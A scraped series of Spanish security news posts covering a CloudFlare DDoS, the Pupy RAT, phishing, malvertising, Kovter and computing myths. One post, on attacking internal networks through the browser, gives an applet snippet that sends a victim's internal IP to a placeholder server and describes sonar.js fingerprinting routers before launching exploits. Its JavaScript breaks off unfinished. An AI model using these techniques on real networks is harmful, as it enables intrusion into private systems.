Aunque por el momento se desconocen los motivos, desde este han comunicado que durante el sábado y parte del domingo sufrieron varios ataques de denegación de servicio que hicieron prácticamente imposible acceder a las páginas alojadas en el CDN y acceder a muchos dominios que se encuentran dentro de su servicio. Tras comprobar esto pusieron en marcha el plan de mitigación de ataques que finalmente funcionó y se recobró casi la normalidad. Según los responsables en algunos momentos se registraron picos superiores a 257.000 peticiones HTTP por segundo, una cifra muy elevada y que ningún servidor puede hacer frente.

Desde el primer instante comenzaron las investigaciones para esclarecer la procedencia de los ataques y la técnica usada, concretando que China es el país de origen de más del 98% del tráfico. Sin embargo, en ocasiones anteriores el firewall de este país era el utilizado para realizar estos ataques, algo que no ha sucedido en esta ocasión modificando las técnicas del ataque.

Para atacar a CloudFlare se ha utilizado un servicio de anuncios para dispositivos móviles

Todo parece indicar que los atacantes hicieron uso de las peticiones enviadas por usuarios reales a un servicio de anuncios disponible tanto para dispositivos de sobremesa como móviles para realizar peticiones Ajax que tenían como destino el servicio que nos ocupa. Según se ha podido analizar el 72% del tráfico pertenecía a dispositivos móviles, siendo una clara minoría el perteneciente a equipos de sobremesa.

Teniendo en cuenta que se trata de un servicio de publicidad todo parece indicar que el tráfico no necesariamente procedía de un navegador web, sino que gran porcentaje era generado por aplicaciones móviles, es decir, banners publicitarios ubicados en software gratuito que hoy en día podemos encontrar en muchas aplicaciones por ejemplo de la Google Play Store si hablamos de Android.

Casi todo el tráfico procedía de China por lo que el ataque estaba dirigido contra este servicio en concreto y por algún motivo que por el momento no ha salido a la luz. Teniendo en cuenta lo sensibles que son en dicho país con el contenido de páginas web no sería para nada descabellado pensar que lo han hecho para forzar a los responsables del servicio a retirar alguna web.

Hay que recordar que uno de los motivos de los ataques de GitHub era la existencia de un software que permitía saltarse el control del firewall existente en dicho país y que no permite a los usuarios acceder por ejemplo a Facebook o Twitter.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

Pupy: Herramienta para administrar remotamente tu equipo, creada completamente en Python

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/pupy-herramienta-para-administrar-remotamente-tu-equipo-creada-completamente-en-python/
TAGS: Pupy, Python, WINDOWS

Pupy es una nueva herramienta para administrar remotamente cualquier equipo (RAT), este software hará las delicias de cualquier administrador de sistemas y también de los expertos en seguridad ya que es software libre y está escrito en Python, por lo que podremos en cualquier momento incorporar nuevas características para controlar al detalle todo el sistema.

Pupy es un software multiplataforma, puede ejecutarse tanto en sistemas Microsoft Windows y GNU/Linux, tan sólo deberemos tener instalado Python en nuestro sistema operativo para poder ejecutarlo. Los desarrolladores de Pupy lo han probado en Windows 7, Kali Linux y también Ubuntu, por lo que en principio en cualquier distribución basada en Debian también sería compatible. Dependiendo del sistema operativo donde lo usemos, tendremos unas características de administración remota u otras.

Características de Pupy en sistemas Windows

Una de las características más interesantes de Pupy para sistemas Windows es que el payload (carga útil) está compilado como un DLL de reflexión mientras el intérprete de python está cargado en memoria, por lo tanto Pupy no toca el disco duro en ningún momento, ideal para evitar los análisis forenses. En este sistema operativo Pupy permite grabar las pulsaciones de teclado (keylogger), además también permitiría realizar capturas de pantalla del propio sistema, por último permite la migración tanto de arquitectura x86 a x64 y viceversa, además es persistente por lo que podremos ponerlo al inicio del sistema de tal forma que al reiniciar el equipo se pueda seguir ejecutando automáticamente.

Principales características de Pupy

Otras características de Pupy que son comunes en todos los sistemas operativos compatibles es que puede migrar reflexivamente a otros procesos, además puede importar remotamente y desde memoria paquetes python (.py, .pyc) e incluso Python compilados (.pyd). Los módulos Python importados no tocan el disco duro ya que están específicamente diseñados para ello, aunque los Python compilador actualmente solo funcionando en Windows ya que para Linux no se ha implementado todavía.

Todas las comunicaciones desde el origen hasta el destino y viceversa se realizan a través de conexiones TLS inversas, de esta manera evitaremos que usuarios malintencionados sean capaces de leer la información de nuestro sistema. Si administramos un gran número de máquinas en la misma red, podremos ejecutar una misma orden en todas ellas sin necesidad de ir una por una, además se pueden programar las tareas en background para que no haya que estar continuamente entrando en los sistemas.

Algunos de los módulos implementados actualmente son:

• Ejecución de comandos.


• Descarga de archivos


• Subida de archivos


• Proxy SOCKS5


• Reenvío de puertos local


• Shell interactiva (cmd.exe, /bin/sh, /bin/bash…)


• Shell interactiva de Python

Os recomendamos visitar el proyecto Pupy en el GitHub oficial donde encontraréis todo el código fuente y la última información sobre los desarrollos de más módulos.

Source:http://www.redeszone.net/

Noticias de seguridad informática

¿Cómo hackear y explotar la red interna y IPs privadas?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/como-hackear-y-explotar-la-red-interna-y-ips-privadas/
TAGS: como saber ip privada, explotar red interna, sonar js


Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de empresa de seguridad informática explica los procedimientos para explotar la red interna:

• Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están siendo aprovechado para la entrega de malware masivo.


• Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.


• El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.


• El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

 

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

 

http://webserver/dirección_ip.html?nat = XXXX

 

<APPLET CODE=”MyAddress.class”>

<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>

</APPLET>

 

Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.

 

function natIP()

Framework para explotar la red interna

Sonar

Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.

¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.

[caption id="attachment_6457" align="alignnone" width="859"] Sonar js[/caption]

 

¿Cómo funciona Sonar?

Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:

• sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuario


• sonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.


• Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de

<img src="x"> and <link rel="stylesheet" type="text/css" href="x">

y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.

Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.

 

[caption id="attachment_6458" align="alignnone" width="800"] Sonar-chrome[/caption]

 

Acuerdo con expertos de empresa de seguridad informática, mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

 
Noticias de seguridad informática

Otra nevera hackeada… ¿cómo de seguro es el Internet de las Cosas?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/otra-nevera-hackeada-como-de-seguro-es-el-internet-de-las-cosas/
TAGS: nevera hackeada…, Samsung

Mire a su alrededor. Cuente los objetos conectados a Internet. Puede encontrarse desde móviles hasta televisiones, pasando por tabletas, ordenadores o wearables. En algunos casos nos encontraremos con alguna nevera o lavadora inteligente. Hace tiempo que la tecnología e Internet de las Cosas se coló hasta la cocina. Cada día los aparatos que nos rodean son más inteligentes, pero la seguridad siempre no va en paralelo a ese brutal desarrollo de especificaciones y nuevas funcionalidades.

Recientemente, un grupo de expertos en seguridad consiguieron ‘hackear’ una de las neveras inteligentes de Samsung (ModeloRF28HMELBSR). Se trata de un electrodoméstico que cuenta con una pantalla táctil de ocho pulgadas, lo que permite consulta el calendario, reproducir música, consultar la previsión del tiempo, ver la tele, navegar e, incluso, hacer llamadas de teléfono.

Interceptan las comunicaciones entre la nevera y Calendar

La intromisión corrió de la mano de los hackers de ‘Black Hat’ que fueron capaces de crear unos credenciales falsos con los que interceptar las comunicaciones entre la nevera y Google Calendar. Este sistema, el de la nevera hackeada, podría servir -hipotéticamente- para robar las credenciales de un usuario de Google. Sin embargo, los piratas primero hubiesen tenido que conseguir conectarse a la red Wi-Fi de la nevera.

Samsung comercializa esa nevera desde 2014 en Estados Unidos, pero no ejecuta el software creado por SmartThings, una compañía que reforzó la apuesta por el Internet de las Cosas por parte de Samsung. Este experimento para piratear la nevera, sobre la que la multinacional no se ha pronunciado aún, se hizo en el marco de la CON DEF celebrada en Las Vegas. Y no, no fue el único dispositivo en el que se encontraron vulnerabilidades.

Nevera hackeada… y cafeteras, básculas o cámaras

De esta manera, en la CON DEF encontraron hasta 25 problemas de seguridad hasta en 14 dispositivos conectados como lectores de huellas, cafeteras, cámaras, cerraduras o centros de domótica.

Pero, ¿hasta dónde llega el alcance de una nevera hackeada o de una lavadora pirateada? El daño va vinculado a los datos que almacenan. Quién sabe si el día de mañana, nuestro frigorífico tendrá almacenados nuestros datos bancarios para encargar la compra rápidamente desde la pantalla de puerta cuando veamos que las telarañas comienzan a asomar por el estante superior. Sin embargo, esto no es óbice para que a día de hoy las empresas pongan un enfásis especial en la protección de cada gadget o aparato que se vaya a conectar a la red.

Noticias de seguridad informática

¡Cuidado! Hackers roban las claves de Google con un SMS falso

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/cuidado-hackers-roban-las-claves-de-google-con-un-sms-falso/
TAGS: Gmail, hackers, phishing, robo datos

La compañía de seguridad informática Panda Security alerta de que un grupo de investigadores de la Universidad de Toronto ha detectado un ataque de phishing con el que los hackers intentan robar a los usuarios las claves de acceso a Google.

Según explican los expertos, el ataque está muy bien diseñado y articulado para hacerse pasar por el servicio del gigante de Internet y conseguir de este modo engañar a las víctimas.

En primer lugar, los ciberdelincuentes envían al usuario un SMS falso a su teléfono móvil en el que se hacen pasar por una comunicación emitida por Google. En el mensaje de texto fraudulento se informa a la víctima de que alguien ha tratado de acceder a su cuenta en el servicio, con la finalidad causar alarma y preocupación para continuar con el ataque.

Pasados alrededor de 10 minutos de la recepción del SMS, llega un correo electrónico a la bandeja de entrada de la víctima con una nueva notificación falsa que se hace pasar por el servicio de Google, en la que se alerta al usuario de que se ha producido un intento de inicio de sesión inesperado.

El mensaje recomienda a la víctima que cambie la contraseña para no correr riesgos, y contiene un enlace que lleva a una página falsa que imita a la pantalla de cambio de claves de Google, como puedes ver en la imagen a continuación.

Esta página se trata de una herramienta de phishing, de manera que cuando el usuario introduce sus claves de acceso los hackers las guardan en su base de datos para utilizarlas de forma fraudulenta.

A continuación, cuando los atacantes entran en la cuenta desde una ubicación desconocida, Google envía un código real por SMS para que el usuario verifique el acceso, y ellos se lo solicitan a su vez a la víctima para, además de robar la contraseña, burlar la verificación en dos pasos de la plataforma.

Para evitar caer en este tipo de fraudes, si en algún momento recibes una alerta de estas características recuerda acudir siempre a la página original del servicio y no seguir los enlaces sospechosos que te lleguen a través de un mensaje de texto o del correo electrónico.

En caso de que tengas sospechas de que alguien está intentando acceder a tu cuenta, cambia la contraseña mediante las herramientas oficiales o comunícalo al servicio de soporte para que te pueda ayudar.

Fuente:http://computerhoy.com/

Noticias de seguridad informática

Más malware para el porno: esta vez afecta a las webs

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/mas-malware-para-el-porno-esta-vez-afecta-a-las-webs/
TAGS: Malware, xhamster

Aplicaciones que te hacen fotos mientras ves porno (y después te chantajean), virus en Facebook con apariencia erótica capaces de secuestrar tu ordenador, y "troyanos sexuales" que bloquean tusmartphone… Que el contenido “subido de tono” es uno de los blancos habituales del malware es una realidad que plasman a la perfección los anteriores casos.

A lista, sin embargo, hay que sumar algunas víctimas más pues, según ha informado la empresa de seguridad Malwarebyces, una nueva tanda de software malicioso está asechando (sí, con “s”) a los sites “para adultos”.

En qué consiste este nuevo malware

En concreto se manifiesta en forma de anuncio, una publicidad engañosa que se está distribuyendo a través de TrafficHaus y que oferta un supuesto Sex Messenger. Incluso ha llegado a colarse en Xhamster, una de las páginas porno más visitadas de la red (aunque ya ha solucionado el problema).

Como suele ser habitual, este malvertising instala ransomware (que restringe el acceso a determinados archivos o partes del sistema) en la máquina de la víctima y abre la típica ventana confalsas acusaciones de actividad criminal, y las indicaciones para pagar la correspondiente y supuesta multa.

En situaciones como esta, evidentemente, resulta imprescindible evitar el pago y denunciar el hecho a la policía, en nuestro caso a la unidad de delitos telemáticos que, además, contesta con bastante celeridad. Ante todo, sin embargo, convendría tener instalado en el ordenador un programa específico y lo suficientemente potente como para acabar con los archivos de esta clase u otros similares que sean dañinos.

Al margen de lo dicho, no podemos dejar de comentar que, a pesar de que existe la creencia de que los sitios porno son menos seguros que el resto de webs, el consultor de seguridad de Malwarebytes Jerónimo Segura, no comparte esta afirmación: “yo no creo que sea del todo cierto que las webs para adultos sean más peligrosas de visitar que los sitios regulares […] estos destinan una gran cantidad de recursos a la lucha contra el fraude y el malware”, indica.

Fuente:http://www.genbeta.com/

Noticias de seguridad informática

El malware Kovter pasa a alojarse en el registro de Windows

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/el-malware-kovter-pasa-a-alojarse-en-el-registro-de-windows/
TAGS: malware Kovter, registro de Windows

En ocasiones anteriores ya hemos hablado sobre las formas de distribución que posee este malware. Sin embargo, expertos en seguridad han detectado novedades relacionados con el alojamiento de este en el sistema operativo Windows y sus persistencia. Kovter es una amenaza que no es una novedad pero tal y como sucede en muchos casos es después de varios meses cuando alcanza su mayor tasa de infección.

El problema al que tienen que hacer frente los ciberdelincuentes es que hasta el momento la mayoría de las amenazas residen en el sistema de archivos, provocando que los usuarios puedan eliminar los archivos de una forma relativamente sencilla, ya que solo necesitan conocer la ruta en la que estos se encuentran y así neutralizar la amenaza. Aunque no resulte algo nuevo, los propietarios del virus informático que nos ocupa se han percatado de que esto es un problema y han modificado la forma en la este persiste en el sistema, pasando a alojarse en el registro del sistema operativo.

Sin lugar a dudas esta es una de las amenazas que más ha cambiado desde su aparición, adoptándose a las nuevas formas de infección y adquiriendo las funciones demandas por los ciberdelincuentes.

Hay que recordar que Kaspersky detectó la versión 2.0.3 de esta amenaza el pasado mes de mayo y que la primera vez que se dejó ver en Internet fue a principios de año a través de anuncios que dirigían a los usuarios a páginas web que distribuían la amenaza.

Por el momento los ciberdelincuentes no aprovechan el potencial de Kovter

Los expertos en seguridad de Symantec han concretado que a la forma de difusión anterior hay que añadir también que en la actualidad se está utilizando el envío de correos electrónicos con un adjunto que es el instalador de esta amenaza. Afirman también que por el momento desconocen los motivos que llevan a los ciberdelincuentes a desaprovechar el potencial de esta amenaza, centrándose únicamente el robo de credenciales a través de páginas falsas.

Para evitar que el malware sea eliminado con suma facilidad del sistemas los ciberdelincuentes han tomado la decisión de que este persista en el registro de Windows. De esta forma el virus posee toda la información necesaria al alcance y si se realiza algún cambio en el sistema la adaptación puede ser mucho más sencilla, además de que la detección es mucho más complicada.

Las infecciones muy repartidas entre los países

Por el momento no existe un país que aglutine la mayoría de las infecciones, aunque sí que es verdad que Estados Unidos se lleva de momento la palma. Algunos países de Europa no se quedan atrás y muestran un número de infecciones bastante importante, como por ejemplo Alemania, Francia, Polonia o incluso España. La amenaza también ha llegado a Asia y Oceanía pero en menor medida.

Añadir que todos aquellos usuarios que estén afectados por la amenaza tienen a su disposición una herramienta desarrollada por Symantec que permite eliminar esta con suma facilidad.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

11 leyendas urbanas de la informática que se niegan a morir

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/11-leyendas-urbanas-de-la-informatica-que-se-niegan-a-morir/
TAGS: HTML5, Malware

La informática no se libra de las leyendas urbanas. Hay unos cuantos mitos que todo el mundo ha oído que persisten en el tiempo, y que repasamos aquí.

Es imposible librarse de las leyendas urbanas y los mitos, ni siquiera cuando se trata de un ordenador. Muchos de ellos perviven en el tiempo, pasando de persona a persona y de usuario a usuario. Algunos de ellos tienen algo de verdad, pero gracias al progreso tecnológico han quedado en falacias.

Otras leyendas y mitos son simples malentendidos, mientras que otros existen para que terceras personas se aprovechen económicamente de ti. Sólo en Windows ya existen muchos mitos innecesarios sobre aumentar el rendimiento o la seguridad. Y es que no, no es necesario deshabilitar servicios para que el ordenador vaya más rápido o borrar el archivo de paginación. Si quieres que tu ordenador rinda mejor y sea más seguro, lo que necesitas es actualizarlo y usar el sentido común.

Después de esta introducción vamos a repasar once mitos de la informática que se niegan a morir y que han llegado al día de hoy.

11 creencias falsas comunes sobre la informática

Hay hackers queriendo entrar en tu PC

Vale, de acuerdo, Internet es un lugar peligroso: Está lleno de malware y esquemas de ingeniería social para conseguir toda clase de objetivos. Esto es, hasta cierto punto, cierto. Ahora bien, la fantasía hollywoodiense de un hacker intentando entrar en el ordenador de un usuario cualquiera -un Don Nadie como tú y yo- no es para nada cierta.

[caption id="attachment_6412" align="alignnone" width="620"] Un hacker tecleando en la oscuridad[/caption]

Para empezar, los ataques informáticos son procesos automatizados. Tu ordenador podría infectarse fácilmente con un keylogger -un tipo de virus que lee tus pulsaciones en el teclado- y hasta puedes recibir un correo electrónico que intenta que introduzcas tus datos personales en una falsa página legítima. Esto sí puede pasar, pero no existe la figura del hacker tecleando en una terminal buscando agujeros en un ordenador personal cualquiera. Los usuarios anónimos no somos tan interesantes.

Si hubiese algo buscando agujeros para colarse en nuestro PC es más probable que sea un botnet o cualquier otro sistema automático que busca sistemas desactualizados. La única forma de ser el objetivo de un ataque coordinado es ser un objetivo valioso como una gran empresa o un gobierno. Lo que los hackers quieren no es tu información, sino el premio gordo.

Apaga tu ordenador por las noches

Apagar tu ordenador no es algo que tengas que hacer de forma regular, suponiendo que estés usando un PC que se construyó como mucho hace diez años. No, no quieres que tu ordenador esté funcionando a pleno rendimiento toda la noche, pero dejarlo en estado de hibernación hace que casi no consuma energía y que esté listo para volver a funcionar cuando vuelvas a pulsar el botón de encendido.

[caption id="attachment_6413" align="alignnone" width="620"] Botón de encendido[/caption]

En los portátiles, para ponerlos a "dormir", suele bastar con cerrar la tapa. Los ordenadores de sobremesa más modernos incluyen modos de hibernación en su menú de apagado. Incluso los sistemas operativos modernos ponen el ordenador en modo de hibernación de forma automática pasados unos minutos. Lo cierto es que pasar por todo el proceso de encendido y apagado puede ser muy poco eficiente con tu tiempo. Puede que quieras reiniciar de forma ocasional, pero no tienes que pasar por todo este proceso a diario.

Las actualizaciones automáticas romperán tu PC

Vamos a romper una lanza en favor de las actualizaciones automáticas. Hay usuarios que desactivan las actualizaciones automáticas de Windows -e incluso las de los navegadores- porque les preocupa que se puedan "romper" cosas de sus sistemas. Y sí, en ocasiones muy raras puede pasar, pero en general las actualizaciones automáticas son algo bueno.

[caption id="attachment_6414" align="alignnone" width="620"] Actualizaciones automáticas[/caption]

Estas actualizaciones ayudan a mantener el ordenador seguro y funcionando como es debido. Que el sistema deje de funcionar bien por culpa de un nuevo parche es algo muy raro. Los agujeros de seguridad son una preocupación mayor, y es por eso que recomendamos dejarlas activadas en el sistema operativo y los navegadores.

Si no te fías de los parches que envía una empresa cualquiera para actualizar su producto, entonces ya no tendrías que estar usándolo, para empezar. En Windows 8 y Windows 10 las actualizaciones ya no requieren que reinicies el sistema y son menos molestas en general.

Internet Explorer es lento, vulnerable y malo

Entre las hordas de geeks que poblamos la red de redes, Internet Explorer es un chiste. En Microsoft se han hartado tanto de la mala fama de Internet Explorer que han desarrollado un nuevo navegador llamado Edge en Windows 10, sólo para alejarse de la reputación de su antecesor.

[caption id="attachment_6415" align="alignnone" width="620"] Internet Explorer 11[/caption]

Sin embargo, las versiones más recientes de Internet Explorer no son para nada malas. Con Internet Explorer 9 las cosas mejoraron mucho, y con las dos versiones siguientes fueron mejores aún. Las últimas iteraciones de Internet Explorer soportan muchos estándares HTML modernos que se pueden encontrar en otros navegadores, y cuentan con motores JavaScript muy rápidos. Internet Explorer incluso cuenta con un modo sandbox y un diseño multiproceso, dos características muy importantes que Firefox, por ejemplo, aún no ofrece. Algunas pruebas hasta han determinado que Internet Explorer trata mejor las baterías de los portátiles que los navegadores de la competencia.

Ojo: No estamos diciendo que tengas que usar Internet Explorer obligatoriamente. Yo mismo soy un usuario ferviente de Chrome, pero Internet Explorer ya no es tan malo como solía ser.

El uso excesivo de memoria RAM es malo

Los sistemas operativos modernos intentan usar tanta RAM como les sea posible. Pasa en los principales sistemas operativos de escritorio, y también en los sistemas operativos móviles. Incluso los navegadores web modernos consumen bastante RAM.

[caption id="attachment_6416" align="alignnone" width="620"] Consumo memoria RAM[/caption]

Pues bien, esto es algo bueno. Cuando los datos se encuentran colocados en la memoria RAM tu ordenador puede acceder a ellos más rápidamente. Tiene sentido dejar aplicaciones o archivos temporales en la RAM, donde se podrá acceder a ellos más rápidamente en el futuro. De hecho, una RAM completamente vacía es totalmente inútil.

Si tu ordenador necesita más memoria RAM para hacer algo, puede borrar instantáneamente la que tiene en caché para liberar espacio. Si al mirar un informe de consumo de recursos de tu PC ves un uso de memoria elevado, siempre y cuando el rendimiento sea bueno, no tienes de qué preocuparte.

No es necesario usar optimizadores de memoria en Windows o Android. Estas aplicaciones eliminan datos en caché de la memoria RAM, haciendo que haya menos procesos, pero también frenando el rendimiento de tu ordenador.

Desfragmentar el disco mejora el rendimiento

No te preocupes por desfragmentar el disco. Windows tiene una utilidad incorporada que funciona de forma automática siguiendo un programa. No tienes que abrirla y ejecutarla de forma manual, ya lo hará Windows por ti. No tienes que desfragmentar para que tus juegos tengan un rendimiento máximo siquiera, ya que Steam desfragmenta los archivos de un único juego de forma automática.

[caption id="attachment_6418" align="alignnone" width="620"] Desfragmentador de disco[/caption]

Quizá para los discos duros mecánicos, hace muchísimo tiempo, si era necesario usar un desfragmentador. Desde que llegaron los discos duros de estado sólido o SSD ya no tiene sentido hacerlo. Las velocidades de lectura y escritura de estas unidades son tan altas que no deberías notar descenso en el rendimiento, además de que al tratarse de una especie de memoria flash no existe la fragmentación propiamente dicha a un nivel puramente lógico.

Hacen falta codecs para ver vídeos online

Hubo un tiempo en el que se necesitaban codecs para ver vídeos online: RealPlayer, QuickTime, Windows Media Player y DivX eran necesarios a menudo. Otras veces era necesario el codec de Java, y más tarde llegó Silverlight. Hoy en día casi todo funciona con HTML5, haciendo innecesario usar todos esos codecs. Dentro de un tiempo Adobe Flash Player también acabará por desaparecer de la web.

[caption id="attachment_6419" align="alignnone" width="620"] Codecs HTML5[/caption]

Resumiendo: No hace falta instalar codecs para ver vídeos online. Si haces clic en un enlace en redes sociales o en otra web y te piden que instales algo para ver el contenido, en realidad lo que están haciendo es intentar engañarte para instalar software basura o junkware que no quieres. Tampoco necesitas codecs para ver vídeos que hayas descargado, sólo tienes que descargar el reproductor VLC.

Los virus y el malware rompen tu ordenador

"Si el ordenador no te funciona bien, es porque debes tener un virus". Este es uno de los mantras que más se repiten a menudo entre los usuarios a pie de calle. Sin embargo, es totalmente falso. El malware moderno está tan enfocado a conseguir beneficio económico que puede que ni llegues a notar un cambio en el rendimiento si tienes un keylogger funcionando en segundo plano.

[caption id="attachment_6420" align="alignnone" width="620"] Malware[/caption]

Es posible que tu ordenador se infecte con malware y que esté usando sus recursos para, por ejemplo, minar BitCoins y participar en ataques DDoS como ordenador réplica contra webs legítimas. Sin embargo, los virus no son los que ralentizan un PC. Quizá tienes demasiados programas en el arranque del sistema operativo, o quizá tu navegador está cargado de add-ons innecesarios. Quizá el problema es un mal funcionamiento del hardware, no un virus misterioso que hace que tu ordenador funcione peor.

El antivirus siempre te protegerá

Muchos usuarios entienden que los antivirus no son perfectos. No existe nada seguro al 100%, pero mucha gente parece creer que los antivirus son bastante efectivos. La verdad da más miedo: un antivirus no es más que una útil última línea de defensa en Windows, pero no son algo en lo que puedas confiar ciegamente. Incluso Symantec, los fabricantes de Norton Antivirus, han dicho que este tipo de software falla a la hora de detener muchos ciberataques.

[caption id="attachment_6421" align="alignnone" width="620"] Antivirus[/caption]

Lo que es peor aun: la mayoría de los antivirus no son capaces de protegerte contra el crapware. Los antivirus permiten alegremente que este tipo de software entre en tu navegador y secuestren tu navegador, obligándote a usar motores de búsqueda de dudosa legitimidad y enviándote anuncios adicionales. La mayoría de los antivirus gratuitos también vienen empaquetados con junkware, con eso está todo dicho.

Esto no significa que el fin del mundo se acerca, y no significa que debas abandonar los antivirus totalmente. Un antivirus debe ser sólo la última línea de defensa, siendo la primera de ellas tu sentido común.

Limpiar la caché mejora el rendimiento

Algunas aplicaciones guardan archivos en caché, que son copias offline de archivos que ya han descargado. Las guardan en caso de que las necesiten de nuevo, de forma que se pueda acceder a ellas de forma local en lugar de volver a descargarlas desde Internet. Esto ahorra tiempo y ancho de banda de tu conexión.

[caption id="attachment_6422" align="alignnone" width="620"] CCleaner[/caption]

Tu navegador web también tiene su propia caché, compuesta de pedazos de páginas web,scripts, imágenes y mucho más. Herramientas como CCleaner limpian esta caché para liberar espacio, pero esto no tiene por qué ser una buena idea. Limpiar esta caché de forma regular significa que tu navegador tiene que volver a descargarlo cada vez que lo usas, ralentizando tu navegación. Vacías espacio de disco para nada, porque en cada uso el navegador vuelve a descargar dichos archivos de caché.

Las herramientas automatizadas son útiles

Existe una creencia común según la cual los limpiadores del ordenador, del registro, los actualizadores automáticos de drivers y los desinstaladores múltiples son útiles. Lo cierto es que no son necesarios:

• Los limpiadores de PC son por norma general engaños. Prometen mejorar drásticamente el rendimiento de tu ordenador corrigiendo todo tipo de "problemas" con tu PC, e incluso pueden borrar archivos temporales -algo que ya puedes hacer con CCleaner-. Lo cierto es que no vas a notar mejoras en el rendimiento.


• Los limpiadores de registro son igual de inútiles. No es necesario limpiar el registro, las entradas extra no ralentizan el ordenador.


• Los actualizadores automáticos de drivers son igualmente malos. No siempre se necesitan las últimas versiones de los controladores, y los gráficos se actualizan automáticamente. Igualmente, con Windows 10 se te obligará a tener las últimas versiones de los drivers.


• Los desinstaladores múltiples no ayudan a hacer desinstalaciones más limpias. Puede que te ayuden a eliminar unos cuantos archivos extra muy pequeños y las entradas del registro de dicho programa, pero eso no tiene ningún efecto en el rendimiento del ordenador. Rara vez necesitarás un desinstalador para limpiar un programa que se niega a irse de forma correcta, pero eso es otra historia.

[caption id="attachment_6423" align="alignnone" width="620"] Actualizador automatico de drivers[/caption]

Estas son sólo herramientas con propósitos engañosos que sólo existen para aprovecharse económicamente del usuario. Lo más inteligente es coger el dinero que invertirías en una de estas soluciones -generalmente son de pago- e invertirlo en actualizar tu ordenador. Así sí conseguirás mejorar el rendimiento del PC. También existen versiones gratuitas de estas aplicaciones, pero son igualmente innecesarias.

Existen más mitos acerca de la informática que se aceptan como verdad, pero estos son los más comunes. No se trata sólo de ordenadores: Desde los smartphones a otros tipos de hardware, tenemos toda clase de mitos. ¿Has oído tú alguno de ellos? Cuéntanoslo en los comentarios.

Fuente:http://www.malavida.com/

Noticias de seguridad informática